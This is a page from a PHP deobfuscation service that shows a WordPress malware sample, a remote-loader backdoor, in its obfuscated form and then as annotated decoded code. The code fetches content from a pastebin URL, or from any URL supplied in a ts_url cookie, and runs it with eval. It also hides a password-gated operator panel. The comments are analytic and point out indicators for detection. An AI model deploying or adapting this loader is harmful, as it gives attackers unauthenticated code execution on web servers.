
PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware, viruses and injected (tampering) code found on WordPress sites back into readable code.

*Please note that not all obfuscated code can be decoded.

The code below has been decoded.

<?php goto tcqlK; GjvMH: exit; goto nHsBc; FBy0J: exit; goto F6D4c; ocCDX: goto NIBbC; goto SyIRz; FzESz: T5ADV: goto c76QS; SyIRz: aseYF: goto av04h; X0YSD: NNpQE: goto jzoCv; ot1Fp: $PFO4A = @file_get_contents(@$_COOKIE["\x74\x73\137\x75\162\x6c"]); goto vm576; RdqPv: goto KuxOe; goto Y93N7; Rd...



Obfuscated PHP code

<?php
 goto tcqlK; GjvMH: exit; goto nHsBc; FBy0J: exit; goto F6D4c; ocCDX: goto NIBbC; goto SyIRz; FzESz: T5ADV: goto c76QS; SyIRz: aseYF: goto av04h; X0YSD: NNpQE: goto jzoCv; ot1Fp: $PFO4A = @file_get_contents(@$_COOKIE["\x74\x73\137\x75\162\x6c"]); goto vm576; RdqPv: goto KuxOe; goto Y93N7; RdtVW: KuxOe: goto aB_8M; tcqlK: echo "\147\151\146"; goto z_zoF; N1oTf: exit; goto RdqPv; hk_nc: exit; goto jpSib; d99j4: goto XSK8a; goto r3cyY; ArCw7: echo "\163\x75\x63\x63\x65\163\x73"; goto L4AK8; r3cyY: I0KcQ: goto jNiN7; g12Ax: foreach ($bBhZK as $Epdoh) { $LSatl .= chr($Epdoh); gHyPl: } goto xaDHW; p30y5: XSK8a: goto RdtVW; hPwKD: if (isset($_GET["\x74\x73"])) { goto w61XT; } goto EHo1D; WD5O2: exit; goto nnQxC; DzTXr: kj5rP: goto JWKZz; gSWoi: echo "\42\x3e\x3c\142\162\x3e\74\57\x66\x6f\162\x6d\76\xd\xa\x20\x20\40\40\40\40\x20\x20\x3c\x2f\142\157\144\171\x3e\15\12\x20\40\40\x20\40\40\x20\x20"; goto N1oTf; xaDHW: oMe_Q: goto rywzv; Y93N7: H0qoy: goto tHsxJ; L4AK8: exit; goto CLcaN; jzoCv: if (isset($_GET["\165\162\x6c"])) { goto T5ADV; } goto XKtga; nHsBc: goto DpUAH; goto X0YSD; tHsxJ: if (isset($_GET["\x70\144"])) { goto I0KcQ; } goto DacDF; c76QS: $HWmfi = $_GET["\x75\162\x6c"]; goto o3sNT; PWx_f: echo 
"\x20\x20\x20\x20\40\40\40\x20\x3c\150\145\x61\144\76\15\xa\40\40\x20\x20\x20\40\40\40\40\40\x20\x20\74\x73\x74\171\154\145\x3e\xd\xa\x20\40\x20\x20\40\x20\x20\40\40\x20\40\40\x20\x20\x20\40\43\160\x61\163\163\167\157\x72\144\x20\x7b\15\12\40\40\40\x20\40\x20\40\x20\x20\40\x20\40\x20\x20\40\40\x20\40\40\40\157\162\144\x65\162\72\40\62\xd\12\x20\40\x20\x20\40\x20\x20\40\x20\x20\x20\40\40\40\x20\40\x7d\xd\12\15\12\40\40\40\x20\40\x20\x20\x20\x20\40\40\40\x20\x20\x20\x20\x23\165\162\154\x20\173\15\xa\x20\x20\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\40\x20\40\x20\40\40\40\x6f\162\x64\x65\162\x3a\x20\61\15\xa\x20\x20\40\40\x20\40\40\x20\40\40\x20\x20\40\40\x20\x20\175\xd\xa\15\xa\40\40\40\x20\x20\40\x20\40\40\x20\x20\40\x20\x20\x20\40\43\160\x61\163\163\167\157\x72\x64\54\xd\xa\40\40\x20\40\x20\40\x20\40\x20\x20\40\x20\40\x20\40\40\43\x75\162\154\x20\173\15\12\x20\40\40\x20\x20\40\x20\40\40\x20\40\x20\x20\x20\x20\40\x20\40\40\40\x64\x69\x73\160\154\141\x79\x3a\40\142\x6c\x6f\x63\x6b\73\xd\xa\40\40\40\40\x20\x20\40\40\40\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\155\x61\x72\147\151\156\55\142\x6f\164\164\x6f\155\x3a\40\x31\60\160\x78\x3b\15\12\40\40\x20\40\x20\40\x20\x20\40\x20\x20\40\40\40\x20\40\x20\x20\x20\40\x6f\160\x61\143\151\164\x79\x3a\40\x30\73\15\12\40\40\40\x20\x20\x20\40\x20\x20\x20\40\40\x20\x20\x20\x20\40\40\x20\x20\164\x72\x61\x6e\163\151\x74\x69\157\156\x3a\40\157\160\141\143\151\164\x79\x20\56\x33\163\xd\12\x20\40\x20\40\x20\x20\40\40\x20\40\40\x20\40\x20\40\x20\175\xd\xa\xd\12\x20\40\40\40\40\x20\x20\x20\40\x20\40\40\40\x20\40\x20\43\x70\x61\x73\x73\x77\x6f\x72\x64\x3a\150\157\166\145\x72\x2c\xd\12\40\40\40\x20\40\40\x20\40\40\40\40\x20\x20\x20\x20\40\x23\x75\162\x6c\x3a\150\157\166\x65\162\x20\x7b\15\12\x20\x20\40\40\40\x20\x20\40\x20\x20\40\40\x20\x20\x20\40\x20\x20\40\x20\x6f\160\x61\143\x69\x74\x79\x3a\40\x31\xd\xa\40\40\40\40\x20\40\x20\40\40\40\40\x20\x20\40\x20\x20\x7d\xd\xa\xd\xa\40\x20\x20\x20\x20\40\x20\40\x20\40\40\40\40\x20\x20\40\146\x6f\x72
\x6d\x20\x7b\15\12\x20\x20\x20\x20\x20\x20\40\x20\x20\40\x20\x20\x20\40\x20\40\40\40\40\x20\x64\x69\163\160\154\x61\x79\72\40\146\154\145\x78\x3b\15\12\40\40\x20\40\x20\x20\x20\40\x20\x20\40\40\40\40\40\x20\40\40\40\40\146\154\145\x78\55\144\x69\x72\145\x63\x74\x69\157\x6e\72\x20\x63\157\x6c\x75\x6d\x6e\73\xd\xa\40\x20\x20\x20\x20\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\40\x20\x61\154\151\x67\156\55\151\164\145\155\x73\x3a\x20\146\154\145\x78\55\145\156\x64\15\xa\x20\x20\x20\x20\40\x20\x20\x20\40\40\x20\x20\x20\40\x20\x20\175\xd\xa\40\x20\x20\x20\x20\40\40\40\x20\x20\40\40\74\57\163\164\171\x6c\145\x3e\15\xa\40\x20\x20\x20\x20\40\40\40\40\40\40\x20\74\163\143\x72\151\x70\x74\76\144\157\143\165\155\x65\x6e\x74\x2e\x61\144\144\105\166\x65\x6e\x74\114\151\x73\164\145\156\x65\162\50\x22\104\x4f\115\x43\x6f\x6e\x74\145\x6e\164\x4c\157\x61\x64\x65\x64\x22\54\40\x66\x75\156\x63\x74\151\x6f\x6e\x20\50\x29\40\x7b\40\144\157\x63\x75\155\x65\x6e\164\x2e\161\165\x65\x72\x79\x53\145\x6c\145\143\164\x6f\162\50\x22\x23\160\141\x73\x73\167\x6f\162\144\42\x29\x2e\x61\x64\144\105\166\145\x6e\x74\114\151\163\x74\145\x6e\145\x72\50\42\153\x65\171\x64\157\x77\x6e\x22\54\40\x66\165\x6e\x63\164\151\x6f\x6e\x20\50\145\51\40\x7b\x20\42\x45\x6e\164\145\x72\42\x20\75\x3d\75\40\145\x2e\x6b\x65\171\40\x26\x26\40\50\x65\56\160\162\x65\166\145\x6e\164\104\145\146\x61\165\x6c\x74\x28\51\54\x20\x64\157\x63\x75\x6d\145\x6e\x74\x2e\161\x75\x65\x72\171\x53\x65\154\x65\143\164\x6f\x72\50\42\x66\157\162\155\42\x29\x2e\163\x75\x62\x6d\151\x74\50\51\51\40\175\x29\x20\175\x29\x3c\x2f\163\x63\x72\151\x70\164\x3e\15\12\x20\x20\40\40\40\x20\40\x20\74\57\150\145\141\144\76\xd\xa\xd\xa\40\x20\40\x20\40\x20\40\x20\x3c\142\157\x64\171\x3e\xd\xa\x20\40\40\40\x20\40\x20\x20\x20\x20\40\40\74\x66\157\162\x6d\40\x61\143\x74\x69\x6f\156\x3d\x22\42\x20\x6d\145\x74\150\157\144\75\x22\x67\x65\x74\x22\x3e\74\151\156\160\165\x74\40\164\171\x70\x65\x3d\47\x68\x69\x64\x64\145\x6e\47\40\156\141\x6d\x65\75\x27\x74\x73
\x27\40\166\141\154\165\x65\75\47\x31\x27\40\x2f\x3e\x3c\151\x6e\x70\165\164\x20\x74\x79\160\145\x3d\47\150\151\144\x64\x65\x6e\x27\x20\x6e\141\155\145\75\47\x74\152\47\40\x76\x61\154\x75\x65\75\x27\x31\x27\x20\x2f\x3e\x3c\151\156\160\165\164\40\x69\x64\75\x22\160\x61\163\163\167\x6f\x72\144\42\40\x6e\141\155\145\75\x22\160\x64\x22\40\x74\x79\160\x65\x3d\42\x70\141\x73\163\167\x6f\x72\x64\42\x3e\74\142\162\x3e\74\151\x6e\x70\165\x74\x20\x69\144\75\x22\x75\x72\154\x22\x20\156\x61\x6d\x65\x3d\42\165\162\x6c\42\xd\12\40\x20\40\x20\x20\40\40\40\x20\x20\x20\40\x20\40\x20\40\x20\x20\40\x20\x76\141\x6c\165\145\x3d\x22"; goto bwYkR; yPikp: echo ''; goto GjvMH; CLcaN: cmcOY: goto hPwKD; G0OCj: DpUAH: goto p30y5; tVVIl: $bBhZK = [104, 116, 116, 112, 115, 58, 47, 47, 112, 97, 115, 116, 101, 98, 105, 110, 46, 99, 111, 109, 47, 114, 97, 119, 47, 83, 112, 54, 80, 105, 81, 76, 86]; goto jNs0I; c4k4Z: w61XT: goto secus; gJG6G: exit; goto d99j4; aB_8M: vtlp6: goto GbpaU; E8yxU: $Jlevz = "\x24\x32\x79\44\x31\x30\x24\132\145\65\65\x47\x72\x6b\56\x2e\x6c\x52\142\x5a\121\x33\x45\x59\164\150\115\156\117\143\163\162\67\63\71\x49\154\64\146\101\x45\x4e\x6d\151\64\104\x6b\167\x71\161\x4b\x55\127\141\x53\x71\x4d\x46\x58\x57"; goto pH0wC; jNiN7: $mv6XT = $_GET["\x70\144"]; goto Ctf0D; jpSib: fcxNl: goto tBgzv; zjhfn: DT8di: goto ocCDX; nnQxC: xDMDl: goto G0OCj; rywzv: $HWmfi = $LSatl; goto E8yxU; Ctf0D: if (password_verify($mv6XT, $Jlevz)) { goto NNpQE; } goto yPikp; F6D4c: goto xDMDl; goto FzESz; JWKZz: NIBbC: goto R48r4; R48r4: goto vtlp6; goto c4k4Z; vm576: if (!empty($PFO4A)) { goto DT8di; } goto eBWQu; EHo1D: if (empty(@$_COOKIE["\164\x73\x5f\165\162\154"])) { goto aseYF; } goto ot1Fp; eBWQu: $PFO4A = r8Gwg(@$_COOKIE["\164\x73\137\x75\162\154"]); goto zjhfn; DacDF: echo ''; goto gJG6G; GbpaU: if (!is_string($PFO4A)) { goto fcxNl; } goto rUzfS; av04h: $PFO4A = @file_get_contents($HWmfi); goto T9zJu; z_zoF: function R8GwG($HWmfi) { goto tMi9D; tMi9D: $Elxe6 = curl_init(); goto MrNg7; 
MrNg7: curl_setopt($Elxe6, CURLOPT_URL, $HWmfi); goto BML0_; BML0_: curl_setopt($Elxe6, CURLOPT_RETURNTRANSFER, true); goto VzNgC; aXYUg: curl_close($Elxe6); goto Ji1WB; Ji1WB: return $PFO4A; goto wYdo_; VzNgC: $PFO4A = curl_exec($Elxe6); goto aXYUg; wYdo_: } goto tVVIl; jNs0I: $LSatl = ''; goto g12Ax; WCwky: setcookie("\x74\163\x5f\165\162\x6c", '', time() + 36000); goto ArCw7; rRgV7: $PFO4A = r8GWg($HWmfi); goto DzTXr; rUzfS: eval("\x3f\76" . $PFO4A); goto hk_nc; bwYkR: echo isset($_GET["\x75\x72\x6c"]) ? $_GET["\165\x72\x6c"] : ''; goto gSWoi; XKtga: echo "\x45\x72\x72\157\x72\x21"; goto FBy0J; T9zJu: if (!empty($PFO4A)) { goto kj5rP; } goto rRgV7; secus: if (isset($_GET["\164\152"])) { goto H0qoy; } goto PWx_f; yrW70: echo "\165\160\144\x61\164\x65\x64\x20\72\x20" . $HWmfi; goto WD5O2; o3sNT: setcookie("\x74\x73\137\165\x72\x6c", $HWmfi, time() + 36000); goto yrW70; pH0wC: if (!isset($_GET["\164\x73\x5f\162\x65\163\x65\164"])) { goto cmcOY; } goto WCwky; tBgzv: echo "\x45\162\162\157\162";
?>

Decoded (de-obfuscated) PHP code

<?php

// Every response from this file starts with the literal text "gif", whichever branch runs afterwards.
// NOTE(review): the purpose is not evident from the code (possibly an operator marker or a crude
// attempt to look like image content). The fixed prefix is still a usable response signature when
// checking whether a suspicious URL is served by this sample.
echo "gif";
/**
 * Download fallback: fetches the given URL with cURL and returns the response body.
 *
 * The script calls this (spelled r8GWg / r8Gwg; PHP function names are case-insensitive)
 * only after file_get_contents() returned an empty result for the same URL.
 * Only CURLOPT_URL and CURLOPT_RETURNTRANSFER are set here; no timeout or other
 * option is changed from cURL's defaults.
 *
 * @param string $HWmfi URL to fetch (the hard-coded default or the ts_url cookie value)
 * @return string|bool whatever curl_exec() returns: the body as a string, or false on failure
 */
function R8GwG($HWmfi)
{
    $Elxe6 = curl_init();
    curl_setopt($Elxe6, CURLOPT_URL, $HWmfi);
    // RETURNTRANSFER makes curl_exec() hand the body back instead of printing it.
    curl_setopt($Elxe6, CURLOPT_RETURNTRANSFER, true);
    $PFO4A = curl_exec($Elxe6);
    curl_close($Elxe6);
    return $PFO4A;
}
// Default payload location, stored as character codes so the URL never appears as a
// plain string in the file (a grep for "http" or the host name finds nothing).
// The codes decode to hxxps://pastebin[.]com/raw/Sp6PiQLV (defanged here): an indicator
// to look for in outbound requests made by the web server.
$bBhZK = [104, 116, 116, 112, 115, 58, 47, 47, 112, 97, 115, 116, 101, 98, 105, 110, 46, 99, 111, 109, 47, 114, 97, 119, 47, 83, 112, 54, 80, 105, 81, 76, 86];
$LSatl = '';
// chr() turns each code back into its character; the loop rebuilds the URL one byte at a time.
foreach ($bBhZK as $Epdoh) {
    $LSatl .= chr($Epdoh);
}
// $HWmfi is the URL that will be fetched unless a ts_url cookie overrides it further down.
$HWmfi = $LSatl;
// bcrypt hash (prefix $2y$, cost 10) checked with password_verify() in the operator branch.
// The plaintext password is not present in the file; the hash string itself is a stable
// signature for finding other copies of this sample.
$Jlevz = "\$2y\$10\$Ze55Grk..lRbZQ3EYthMnOcsr739Il4fAENmi4DkwqqKUWaSqMFXW";
// Request dispatch for the remote loader. Query parameters ts, tj, pd, url and ts_reset plus the
// ts_url cookie select the branch; every path inside this block ends in exit or return.
// The names and the fixed replies ("updated : ", "Error!", "Error", "success") are useful
// search terms for access logs and response captures.
if (!isset($_GET["ts_reset"])) {
    // ?ts=... opens the operator panel instead of running the payload.
    if (isset($_GET["ts"])) {
        // ts + tj is what the form below submits: the password-gated "change URL" action.
        if (isset($_GET["tj"])) {
            if (isset($_GET["pd"])) {
                $mv6XT = $_GET["pd"];
                // Compare the submitted password against the embedded bcrypt hash.
                if (password_verify($mv6XT, $Jlevz)) {
                    if (isset($_GET["url"])) {
                        $HWmfi = $_GET["url"];
                        // Store the new payload URL in the requesting browser's ts_url cookie
                        // for 36000 seconds (10 hours). Nothing is written on the server.
                        setcookie("ts_url", $HWmfi, time() + 36000);
                        // The URL is echoed back without HTML escaping.
                        echo "updated : " . $HWmfi;
                        exit;
                    }
                    // Correct password but no url parameter.
                    echo "Error!";
                    exit;
                }
                // Wrong password: empty reply apart from the "gif" prefix, nothing to tell a prober why.
                echo '';
                exit;
            }
            // No password supplied: same silent reply.
            echo '';
            exit;
        }
        // ts without tj: render the panel form. The CSS keeps both inputs at opacity 0 until hovered,
        // so the page looks blank. The form uses method="get", which puts the password (pd) and the
        // new URL in the query string, where web server access logs normally record them.
        echo "        <head>\r\n            <style>\r\n                #password {\r\n                    order: 2\r\n                }\r\n\r\n                #url {\r\n                    order: 1\r\n                }\r\n\r\n                #password,\r\n                #url {\r\n                    display: block;\r\n                    margin-bottom: 10px;\r\n                    opacity: 0;\r\n                    transition: opacity .3s\r\n                }\r\n\r\n                #password:hover,\r\n                #url:hover {\r\n                    opacity: 1\r\n                }\r\n\r\n                form {\r\n                    display: flex;\r\n                    flex-direction: column;\r\n                    align-items: flex-end\r\n                }\r\n            </style>\r\n            <script>document.addEventListener(\"DOMContentLoaded\", function () { document.querySelector(\"#password\").addEventListener(\"keydown\", function (e) { \"Enter\" === e.key && (e.preventDefault(), document.querySelector(\"form\").submit()) }) })</script>\r\n        </head>\r\n\r\n        <body>\r\n            <form action=\"\" method=\"get\"><input type='hidden' name='ts' value='1' /><input type='hidden' name='tj' value='1' /><input id=\"password\" name=\"pd\" type=\"password\"><br><input id=\"url\" name=\"url\"\r\n                    value=\"";
        // The url parameter is written into the value attribute without escaping.
        echo isset($_GET["url"]) ? $_GET["url"] : '';
        echo "\"><br></form>\r\n        </body>\r\n        ";
        exit;
    }
    // Normal (non-panel) request: fetch the payload and run it.
    // No ts_url cookie: use the hard-coded default URL decoded earlier in the script.
    if (empty(@$_COOKIE["ts_url"])) {
        // @ suppresses warnings, so a failed download leaves no PHP error output.
        $PFO4A = @file_get_contents($HWmfi);
        if (!empty($PFO4A)) {
            goto kj5rP;
        }
        // file_get_contents() gave nothing: retry the same URL through the cURL helper.
        $PFO4A = r8GWg($HWmfi);
        kj5rP:
        goto JWKZz;
    }
    // A ts_url cookie is present: fetch from the cookie value instead.
    // NOTE(review): the cookie is used as-is here. The password check above only gates the helper
    // that sets the cookie, not this read, so assess the file as an unauthenticated
    // remote-code-execution backdoor.
    $PFO4A = @file_get_contents(@$_COOKIE["ts_url"]);
    if (!empty($PFO4A)) {
        goto DT8di;
    }
    $PFO4A = r8Gwg(@$_COOKIE["ts_url"]);
    // Labels left over from the goto-based control-flow flattening; both download paths join here.
    DT8di:
    JWKZz:
    aB_8M:
    // curl_exec() / file_get_contents() return false on failure; only a string is executed.
    if (!is_string($PFO4A)) {
        echo "Error";
        // [PHPDeobfuscator] Implied script end
        return;
    }
    // Execute the downloaded content. The leading "?>" leaves PHP mode first, so the payload is
    // parsed like an included file: literal text is output and any <?php ... ?> sections run
    // with this script's privileges.
    eval("?>" . $PFO4A);
    exit;
}
// Reached only when the request carries a ts_reset parameter: every path through the preceding
// if block ends in exit or return. No password is checked on this path.
// PHP turns an empty cookie value into a cookie-deletion header regardless of the expiry argument,
// so the browser drops ts_url and later requests fall back to the hard-coded default URL.
setcookie("ts_url", '', time() + 36000);
echo "success";
exit;

